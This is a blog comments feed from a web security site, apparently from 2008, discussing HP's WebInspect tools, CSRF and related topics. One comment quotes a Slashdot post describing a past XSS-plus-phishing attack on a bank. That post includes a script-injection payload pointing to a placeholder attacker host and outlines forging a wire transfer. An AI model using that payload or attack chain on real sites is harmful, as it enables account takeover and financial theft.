Comments for My Pen Test

Comment on Why HP is wrong about the Web Security Lifecycle by Larry Smith

Larry Smith — Sat, 15 Nov 2008 02:09:34 +0000

I think points about WebInspect are fair but WebInspect was adopted by pen testers and security teams long before the development lifecycle was part of the picture for these tools. QA Inspect is actually identical to WebInspect under the hood in that they share exactly all of the identical capabilities except in the area of certain interactive testing modes like step mode. As a matter of practice I recommend that users of QA Inspect consult with WebInspect users and when required scan with WebInspect. QA Inspect helps to automate the process for a qa tester but complex application scans cannot be peformed blindly and thats the major difference between the tools.. the QA Inspect scan result cannot be viewed except as a set of defects in quality center or to import them into and view them with WebInspect… DevInspect on the other hand increases the code coverage of testing by combining static analysis with the black box testing methods of WebInspect…
anyway, good comments,, thanks for the thread

Comment on Why HP is wrong about the Web Security Lifecycle by rada

rada — Tue, 04 Nov 2008 16:32:25 +0000

Thorough study and analysis! Is there any comparable difference between QAinspect and the IBM Appscan? If you have analysed it, please let me know.
Thanks

Comment on My car as an analogy for web security by Stuart Moncrieff

Stuart Moncrieff — Thu, 09 Oct 2008 02:41:50 +0000

Okay, now someone has stolen my rear numberplate, so the car is undrivable (I can’t think of a good web security analogy for this).

No one has tried to break in for the last few months though…

Comment on Cross-Site Request Forgery Whitepaper by Stuart Moncrieff

Stuart Moncrieff — Wed, 01 Oct 2008 03:35:40 +0000

This is now being discussed on Slashdot. My favourite comment so far...

Unsurprising (Score:5, Informative)

by karmatic (776420) on Tuesday September 30, @02:06AM (#25201899)

This really isn't that surprising. A number of years ago, I was in a Wells Fargo branch; their kiosks are limited to showing only wellsfargo.com.

So, in an attempt to get to another site, I typed some HTML into the search box on their homepage, and pretty much every page on their site. Sure enough, it inserted the HTML into the page without any problems.

So, I got home, and whipped up a phishing email. It went to wellsfargo.com, used a little javascript to do a popunder, and set window.location to wellsfargo.com. The popunder self-refreshed every few seconds, and checked the cookies to see when the user had logged in. After the user logs in, it waits 9 minutes (auto-logout was 10 minutes), and then would build a form to initiate a wire transfer, and submit it - while the user was still logged in. It would then close the popunder.

So, with a simple link to a search for something like <script src="http://evilsite.tld">, I could take complete control over someone's bank account. This would be easy to pull off with an email saying something like "We have detected suspicious activity; click here to log on to wellsfargo.com". It really would take them to wellsfargo.com, and they could log in. You don't need a user/password if you control the browser.

I let them know that day, and explained how one escapes HTML. To their credit, it was fixed in a very short period of time. That still doesn't excuse that 1) they should know better, and 2) if you're going to check anything, it should be the one form that's on every page.

Comment on Web Macro Recorder does not record by Joe

Joe — Tue, 26 Aug 2008 13:58:07 +0000

You might also try “http://localhost./” (notice the “.” after localhost). I believe this problem is cuased by the fact that the .NET Framework re-routes localhost queries around proxies, but putting the dot after it tricks the framework into avoiding the bypass.

Comment on Why HP is wrong about the Web Security Lifecycle by Gareth Davies

Gareth Davies — Wed, 09 Jul 2008 12:45:51 +0000

I do not think that diagram should be a fluid one as it is shown.

I think they are pitching WebInspect as a standalone product to test against current WebApplication that were not developed or tested using the other two products.

Good read though!

I am trialing DevInspect at the moment and really like it, however I am finding it hard to get some pricing information.

Comment on Why HP is wrong about the Web Security Lifecycle by Linden

Linden — Sun, 22 Jun 2008 09:37:59 +0000

HP should really push WebInspect to be used both in the Test and Production stages of the SDLC. Compliance standards often necessitate testing of in-production systems so there is some merit to what HP is saying.
To make the “proper” diagram even harder to draw, compliance standards such as PCI DSS, necessitate code revision on a minimum quarterly basis as well as whenever a code change has been made - thus DevInspect can be pitched as useful within the Production stage too!

Comment on WebInspect Scan Signatures by JB

JB — Sun, 08 Jun 2008 04:22:50 +0000

The goolge search for 777-777-1911form@value777.com now returns “about 101,000″ results! Though only one when restricted to Australia.

Comment on My car as an analogy for web security by Chris Younger

Chris Younger — Sat, 17 May 2008 08:49:26 +0000

haha great story Stu! Very entertaining and relevant!

[Stuart's Reply: Wow; RSS feeds are like magic. This post has only been up for an hour or two. :)]

Comment on Google Hacking for Penetration Testers (free e-book download) by kurthin

kurthin — Mon, 05 May 2008 17:26:41 +0000

The free download has been removed?

[Stuart's Reply: Yes. Scribd has removed the content for copyright reasons.]